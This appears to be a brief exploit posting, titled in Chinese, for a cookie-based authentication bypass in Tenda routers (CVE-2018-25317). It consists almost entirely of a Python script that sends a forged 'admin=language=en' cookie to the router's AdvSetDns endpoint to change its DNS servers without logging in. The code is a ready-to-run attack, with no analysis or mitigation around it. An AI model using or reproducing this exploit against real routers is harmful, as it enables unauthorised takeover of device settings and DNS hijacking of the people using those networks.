CVE-2018-25317 Tenda路由器Cookie会话弱点漏洞

import requests # Target configuration target_ip = "192.168.0.1" url = f"http://{target_ip}/goform/AdvSetDns" # Malicious DNS servers to redirect traffic to malicious_dns_primary = "1.1.1.1" malicious_dns_secondary = "1.0.0.1" # Crafted Cookie to exploit session weakness # The vulnerability relies on specific language cookie validation bypass cookies = { "admin": "language=en", "Cookie": "admin=language=en" } # Payload parameters for the DNS settings params = { "GO": "system.asp", "dns1": malicious_dns_primary, "dns2": malicious_dns_secondary } try: print(f"Sending exploit request to {url}...") response = requests.get(url, params=params, cookies=cookies, timeout=5) if response.status_code == 200: print("[+] Request sent successfully. DNS settings may have been changed.") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}")